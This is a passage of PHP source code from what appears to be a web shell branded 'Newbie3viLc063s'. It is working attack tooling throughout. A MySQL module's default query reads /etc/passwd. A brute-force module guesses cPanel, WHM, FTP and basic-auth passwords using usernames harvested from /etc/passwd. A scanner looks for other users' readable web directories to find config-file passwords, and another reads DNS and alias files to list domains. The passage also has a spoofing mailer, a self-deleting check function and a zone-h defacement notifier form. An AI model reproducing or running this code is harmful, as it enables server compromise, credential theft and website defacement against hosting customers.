  597.                                             {
  598.                                             $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];    
  599.                                             if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
  600.                                                     {
  601.                                                     $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  602.                                                     $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  603.                                                     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;
  604.                                                    sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  605.                                                    sqlpass=".$sqlpass."&amp;
  606.                                                    sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  607.                                                     if(isset($_GET['db']))
  608.                                                             $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  609.                                                            <a href=\"y=".$pwd."&amp;x=mysql&amp;
  610.                                                            sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  611.                                                            sqlpass=".$sqlpass."&amp;
  612.                                                            sqlport=".$sqlport."&amp;
  613.                                                            db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  614.                                                     if(isset($_GET['table']))
  615.                                                             $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  616.                                                            </span>&nbsp;&nbsp;
  617.                                                            <a href=\"y=".$pwd."&amp;x=mysql&amp;
  618.                                                            sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  619.                                                            sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;
  620.                                                            db=".$_GET['db']."&amp;
  621.                                                            table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  622.                                                             $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  623.                                                             $msg .= "</div>";
  624.                                                             echo $msg;
  625.                                                     if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
  626.                                                             {
  627.                                                             $db = $_GET['db'];
  628.                                                             $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table;
  629.                                                            \nCREATE TABLE `Newbie3viLc063s0_table` ( `file` LONGBLOB NOT NULL );
  630.                                                            \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM Newbie3viLc063s0_table;
  631.                                                            \nDROP TABLE IF EXISTS Newbie3viLc063s0_table;";
  632.                                                             $msg = "<div style=\"width:99%;padding:0 10px;\">
  633.                                                                            <form action=\"?\" method=\"get\">
  634.                                                                                    <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  635.                                                                                    <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  636.                                                                                    <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  637.                                                                                    <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  638.                                                                                    <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  639.                                                                                    <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  640.                                                                                    <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  641.                                                                                    <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  642.                                                                                    <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  643.                                                                            </form>
  644.                                                                    </div> ";
  645.                                                             $tables = array();
  646.                                                             $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  647.                                                             $hasil = @mysql_list_tables($db,$con);
  648.                                                             while(list($table) = @mysql_fetch_row($hasil))
  649.                                                                     { @array_push($tables,$table); }
  650.                                                             @sort($tables);
  651.                                                             foreach($tables as $table)
  652.                                                                     {
  653.                                                                     $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  654.                                                                     }
  655.                                                             $msg .= "</table>";
  656.                                                             }
  657.                                                     elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  658.                                                             {
  659.                                                             $db = $_GET['db'];
  660.                                                             $table = $_GET['table'];
  661.                                                             $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  662.                                                             $msgq = "<div style=\"width:99%;padding:0 10px;\">
  663.                                                                            <form action=\"?\" method=\"get\">
  664.                                                                                    <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  665.                                                                                    <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  666.                                                                                    <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  667.                                                                                    <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  668.                                                                                    <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  669.                                                                                    <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  670.                                                                                    <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  671.                                                                                    <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  672.                                                                                    <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  673.                                                                                    <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  674.                                                                            </form>
  675.                                                                    </div> ";
  676.                                                             $columns = array();
  677.                                                             $msg = "<table class=\"explore\" style=\"width:99%;\">";
  678.                                                             $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  679.                                                             while(list($column) = @mysql_fetch_row($hasil))
  680.                                                                     {
  681.                                                                     $msg .= "<th>$column</th>"; $kolum = $column;
  682.                                                                     }
  683.                                                             $msg .= "</tr>";
  684.                                                             $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  685.                                                             list($total) = mysql_fetch_row($hasil);
  686.                                                             if(isset($_GET['z'])) $page = (int) $_GET['z'];
  687.                                                             else $page = 1;
  688.                                                             $pagenum = 100;
  689.                                                             $totpage = ceil($total / $pagenum);
  690.                                                             $start = (($page - 1) * $pagenum);
  691.                                                             $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  692.                                                             while($datas = @mysql_fetch_assoc($hasil))
  693.                                                                     {
  694.                                                                     $msg .= "<tr>";
  695.                                                                     foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  696.                                                                     $msg .= "</tr>";
  697.                                                                     }
  698.                                                             $msg .= "</table>";
  699.                                                             $head = "<div style=\"padding:10px 0 0 6px;\">
  700.                                                                            <form action=\"?\" method=\"get\">
  701.                                                                                    <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  702.                                                                                    <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  703.                                                                                    <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  704.                                                                                    <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  705.                                                                                    <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  706.                                                                                    <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  707.                                                                                    <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  708.                                                                                    <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  709.                                                                                    Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  710.                                                             for($i = 1;$i <= $totpage;$i++)
  711.                                                                     {
  712.                                                                     $head .= "<option value=\"".$i."\">".$i."</option>";
  713.                                                                     if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  714.                                                                     }
  715.                                                             $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  716.                                                             $msg = $msgq.$head.$msg;
  717.                                                     }
  718.                                             elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
  719.                                                     {
  720.                                                     $db = $_GET['db'];
  721.                                                     $query = magicboom($_GET['sqlquery']);
  722.                                                     $msg = "<div style=\"width:99%;padding:0 10px;\">
  723.                                                                    <form action=\"?\" method=\"get\">
  724.                                                                            <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  725.                                                                            <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  726.                                                                            <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  727.                                                                            <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  728.                                                                            <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  729.                                                                            <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  730.                                                                            <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  731.                                                                            <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  732.                                                                            <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  733.                                                                    </form>
  734.                                                            </div> ";
  735.                                                     @mysql_select_db($db);
  736.                                                     $querys = explode(";",$query);
  737.                                                     foreach($querys as $query)
  738.                                                             {
  739.                                                             if(trim($query) != "")
  740.                                                                     {
  741.                                                                     $hasil = mysql_query($query);
  742.                                                                     if($hasil)
  743.                                                                             {
  744.                                                                             $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  745.                                                                                    <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  746.                                                                             $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  747.                                                                             for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  748.                                                                             $msg .= "</tr>";
  749.                                                                             for($i=0;$i<@mysql_num_rows($hasil);$i++)
  750.                                                                                     {
  751.                                                                                     $rows=@mysql_fetch_array($hasil);
  752.                                                                                     $msg .= "<tr>";
  753.                                                                                     for($j=0;$j<@mysql_num_fields($hasil);$j++)
  754.                                                                                             {
  755.                                                                                             if($rows[$j] == "") $dataz = "&nbsp;";
  756.                                                                                             else $dataz = $rows[$j];
  757.                                                                                             $msg .= "<td>".$dataz."</td>";
  758.                                                                                             }
  759.                                                                                     $msg .= "</tr>";
  760.                                                                                     }
  761.                                                                             $msg .= "</table>";
  762.                                                                             }
  763.                                                                     else
  764.                                                                             $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  765.                                                                     }
  766.                                                             }
  767.                                                     }
  768.                                             else
  769.                                                     {
  770.                                                     $query = "SHOW PROCESSLIST;\n
  771.                                                            SHOW VARIABLES;\n
  772.                                                            SHOW STATUS;";
  773.                                                     $msg = "<div style=\"width:99%;padding:0 10px;\">
  774.                                                            <form action=\"?\" method=\"get\">
  775.                                                                    <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  776.                                                                    <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  777.                                                                    <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  778.                                                                    <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  779.                                                                    <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  780.                                                                    <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  781.                                                                    <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  782.                                                                    <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  783.                                                                    <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  784.                                                            </form>
  785.                                                            </div> ";
  786.                                                     $dbs = array();
  787.                                                     $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  788.                                                     $hasil = @mysql_list_dbs($con);
  789.                                                     while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  790.                                                     @sort($dbs);
  791.                                                     foreach($dbs as $db)
  792.                                                             {
  793.                                                             $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  794.                                                             }
  795.                                                     $msg .= "</table>";
  796.                                                     }
  797.                                             @mysql_close($con);
  798.                                             }
  799.                                     else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  800.                                     echo $msg;
  801.                                     }
  802.                             else
  803.                                     {
  804.                                     ?>
  805.                                     <form action="?" method="get">
  806.                                     <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  807.                                     <input type="hidden" name="x" value="mysql" />
  808.                                     <table class="tabnet" style="width:300px;">
  809.                                             <tr>
  810.                                                     <th colspan="2">Connect to mySQL server</th>
  811.                                             </tr>
  812.                                             <tr>
  813.                                                     <td>&nbsp;&nbsp;Host</td>
  814.                                                     <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  815.                                             </tr>
  816.                                             <tr>
  817.                                                     <td>&nbsp;&nbsp;Username</td>
  818.                                                     <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  819.                                             </tr>
  820.                                             <tr>
  821.                                                     <td>&nbsp;&nbsp;Password</td>
  822.                                                     <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
  823.                                             </tr>
  824.                                             <tr>
  825.                                                     <td>&nbsp;&nbsp;Port</td>
  826.                                                     <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  827.                                             </tr>
  828.                                     </table>
  829.                                     </form>
  830.                                     <?php
  831.                                     }
  832.                             }
  833.                     elseif(isset($_GET['x']) && ($_GET['x'] == 'mail'))
  834.                             {
  835.                             if(isset($_POST['mail_send']))
  836.                                     {
  837.                                     $mail_to = $_POST['mail_to'];
  838.                                     $mail_from = $_POST['mail_from'];
  839.                                     $mail_subject = $_POST['mail_subject'];
  840.                                     $mail_content = magicboom($_POST['mail_content']);
  841.                                     if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  842.                                             { $msg = "email sent to $mail_to"; }
  843.                                     else $msg = "send email failed";
  844.                                     }
  845.                             ?>
  846.                             <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  847.                                     <table class="cmdbox">
  848.                                             <tr>
  849.                                                     <td>
  850.                                                             <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea>
  851.                                                     </td>
  852.                                             </tr>
  853.                                             <tr>
  854.                                                     <td>
  855.                                                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to
  856.                                                     </td>
  857.                                             </tr>
  858.                                             <tr>
  859.                                                     <td>  
  860.                                                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />
  861.                                                             &nbsp; from
  862.                                                     </td>
  863.                                             </tr>
  864.                                             <tr>
  865.                                                     <td>
  866.                                                             &nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject
  867.                                                     </td>
  868.                                             </tr>
  869.                                             <tr>
  870.                                                     <td>
  871.                                                             &nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
  872.                                                     </td>
  873.                                             </tr>
  874.                                             <tr>
  875.                                                     <td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>
  876.                                                     </td>
  877.                                             </tr>
  878.                                     </table>
  879.                             </form>
  880.                             <?php
  881.                             }
  882.                     elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  883.                             {      
  884.                             ?>
  885.                                     <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  886.                             <?php
  887.                             //bruteforce
  888.                             @ini_set('memory_limit', 999999999999);
  889.                             $connect_timeout=5;
  890.                             @set_time_limit(0);
  891.                             $pokeng         = $_REQUEST['submit'];
  892.                             $hn             = $_REQUEST['users'];
  893.                             $crew           = $_REQUEST['passwords'];
  894.                             $pasti          = $_REQUEST['sasaran'];
  895.                             $manualtarget   = $_REQUEST['target'];
  896.                             $bisa           = $_REQUEST['option'];
  897.                             if($pasti == ''){
  898.                                     $pasti = 'localhost';
  899.                             }
  900.                             if($manualtarget == ''){
  901.                                     $manualtarget = 'http://localhost:2082';
  902.                             }
  903.      
  904.     function get_users()
  905.     {
  906.             $users = array();
  907.             $rows=file('/etc/passwd');
  908.             if(!$rows) return 0;  
  909.             foreach ($rows as $string)
  910.             {
  911.                     $user = @explode(":",$string);
  912.                     if(substr($string,0,1)!='#') array_push($users,$user[0]);
  913.             }
  914.             return $users;
  915.     }
  916.      
  917.     if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
  918.     else
  919.             {
  920.             print " <div align='center'>
  921.                    <form method='post' style='border: 1px solid #000000'><br><br>
  922.                    <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
  923.                            <tr>
  924.                                    <td>
  925.                                            <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
  926.                                            <div align='center'><br>
  927.                                            <TABLE style='BORDER-COLLAPSE: collapse'
  928.                                                    cellSpacing=0
  929.                                                    borderColorDark=#666666
  930.                                                    cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  931.                                                    <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
  932.                                                    </tr>
  933.                                            </table>
  934.                                            <p align='center'>
  935.                                            <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  936.             foreach($users as $user) { echo $user."\n"; }
  937.             print"</textarea>
  938.                    <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
  939.                    <br>
  940.                    <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
  941.                    <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  942.                    <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
  943.                    <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
  944.                    </td></tr></table></td></tr></form><p align= 'left'>";
  945.             }
  946.     ?>
  947.     <?php
  948.      
  949.     function manual_check($anjink,$asu,$babi,$lonte){
  950.             $ch = curl_init();
  951.             curl_setopt($ch, CURLOPT_URL, "$anjink");
  952.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  953.             curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  954.             curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  955.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  956.             curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  957.             $data = curl_exec($ch);
  958.             if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  959.             elseif ( curl_errno($ch) == 0 ){
  960.                     print "<b>[ Newbie3viLc063s0@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  961.                     }
  962.             curl_close($ch);
  963.     }
  964.      
  965.      
  966.     function ftp_check($link,$user,$pswd,$timeout){
  967.             $ch = curl_init();
  968.             curl_setopt($ch, CURLOPT_URL, "ftp://$link");
  969.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  970.             curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  971.             curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  972.             curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd");
  973.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  974.             curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  975.             $data = curl_exec($ch);
  976.             if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit; }
  977.             elseif ( curl_errno($ch) == 0 ){
  978.                     print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
  979.                     }
  980.             curl_close($ch);
  981.     }
  982.      
  983.     function cpanel_check($anjink,$asu,$babi,$lonte){
  984.             $ch = curl_init();
  985.             curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
  986.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  987.             curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  988.             curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  989.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  990.             curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  991.             $data = curl_exec($ch);
  992.             if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  993.             elseif ( curl_errno($ch) == 0 ){
  994.                     print "<b>[ Newbie3viLc063s@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  995.                     }
  996.             curl_close($ch);
  997.     }
  998.      
  999.     function whm_check($anjink,$asu,$babi,$lonte){
  1000.             $ch = curl_init();
  1001.             curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
  1002.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1003.             curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1004.             curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1005.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1006.             curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1007.             $data = curl_exec($ch);
  1008.             if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1009.             elseif ( curl_errno($ch) == 0 )
  1010.                     {
  1011.                     print "<b>[ " . TITLE . " ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1012.                     }
  1013.             curl_close($ch);
  1014.     }
  1015.            
  1016.     if(isset($pokeng) && !empty($pokeng))
  1017.             {
  1018.             $userlist = explode ("\n" , $hn );
  1019.             $passlist = explode ("\n" , $crew );
  1020.             print "<b>[ " . TITLE . "  ]# </b> ATTACK...!!! </font></b><br>";
  1021.             foreach ($userlist as $asu)
  1022.                     {
  1023.                     $_user = trim($asu);
  1024.                     foreach ($passlist as $babi )
  1025.                             {
  1026.                             $_pass = trim($babi);
  1027.                             if ($bisa == "manual")
  1028.                                     { manual_check($manualtarget,$_user,$_pass,$lonte); }
  1029.                             if($bisa == "ftp")
  1030.                                     { ftp_check($pasti,$_user,$_pass,$lonte); }
  1031.                             if ($bisa == "cpanel")
  1032.                                     { cpanel_check($pasti,$_user,$_pass,$lonte); }
  1033.                             if ($bisa == "whm")
  1034.                                     { whm_check($pasti,$_user,$_pass,$lonte); }
  1035.                             }
  1036.                     }
  1037.             }
  1038.     }
  1039.      
  1040.     //bruteforce
  1041.      
  1042.     elseif(isset($_GET['x']) && ($_GET['x'] == 'readable'))
  1043.             {      
  1044.             ?>
  1045.             <form action="?y=<?php echo $pwd; ?>&amp;x=readable" method="post">
  1046.             <?php
  1047.      
  1048.             //radable public_html
  1049.             echo '<html><head><title>Newbie3viLc063s Cpanel Finder</title></head><body>';
  1050.             ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1051.             set_time_limit(0);
  1052.             ###################
  1053.            @$passwd = fopen('/etc/passwd','r');
  1054.             if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1055.             $pub = array();
  1056.             $users = array();
  1057.             $conf = array();
  1058.             $i = 0;
  1059.             while(!feof($passwd))
  1060.             {
  1061.                     $str = fgets($passwd);
  1062.                     if ($i > 35)
  1063.                             {
  1064.                             $pos = strpos($str,':');
  1065.                             $username = substr($str,0,$pos);
  1066.                             $dirz = '/home/'.$username.'/public_html/';
  1067.                             if (($username != ''))
  1068.                                     {
  1069.                                     if (is_readable($dirz))
  1070.                                             {
  1071.                                             array_push($users,$username);
  1072.                                             array_push($pub,$dirz);
  1073.                                             }
  1074.                                     }
  1075.                             }
  1076.                     $i++;
  1077.             }
  1078.             ###################
  1079.            echo '<br><br><textarea class="output" >';
  1080.             echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  1081.             echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  1082.             echo "[~] Searching for passwords in config files...\n\n";
  1083.             foreach ($users as $user)
  1084.                     {
  1085.                     $path = "/home/$user/public_html/";
  1086.                     echo "$path \n";
  1087.                     }
  1088.             echo "\n";
  1089.             echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n";
  1090.             echo "[+] Complete...\n";
  1091.             echo '</textarea><br><br></b>
  1092.            </body>
  1093.            </html>';
  1094.      
  1095.             //radable public_html
  1096.      
  1097.             }
  1098.      
  1099.     elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
  1100.             {      
  1101.             ?>
  1102.             <form action="?y=<?php echo $pwd; ?>&amp;x=localdomain" method="post">
  1103.             <?php
  1104.      
  1105.             //radable public_html
  1106.            
  1107.             echo "<br><br>";
  1108.             $file = @implode(@file("/etc/named.conf"));
  1109.             if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  1110.             preg_match_all("#named/(.*?).db#",$file ,$r);
  1111.             $domains = array_unique($r[1]);
  1112.            
  1113.             function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1114.            
  1115.             check();
  1116.            
  1117.             echo "<table align=center border=1 width=59% cellpadding=5>
  1118.                     <tr><td colspan=2>[+] Here We Have : [<b>".count($domains)."</b>] Listed Domains In localhost.</td></tr>
  1119.                     <tr><td><b>List Of Users</b></td><td><b>List Of Domains</b></td></tr>";
  1120.            
  1121.             foreach($domains as $domain)
  1122.                    {
  1123.                    $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1124.                    echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
  1125.                    }
  1126.            
  1127.             echo "</table>";
  1128.             //radable public_html
  1129.             }
  1130.      
  1131.     elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){  ?>
  1132.     <form action="?y=<?php echo $pwd; ?>&amp;x=zone-h" method="post">
  1133.     <br><br><? echo '<p style="text-align: center;"> <img alt="" src="http://www.zone-h.org/images/logo.gif" style="width: 261px; height: 67px;" /></p>
  1134.    <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="Newbie3viLc063s" /><br> <select class="inputz" name="hackmode">
  1135.    <option>------------------------------------SELECT-------------------------------------</option>
  1136.    <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  1137.    <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  1138.    <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  1139.    <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  1140.    <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  1141.    <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  1142.    <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  1143.    <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  1144.    <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  1145.    <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  1146.    <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  1147.    <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  1148.    <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  1149.    <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  1150.    <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  1151.    <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  1152.    <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  1153.    <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  1154.    <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  1155.    <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
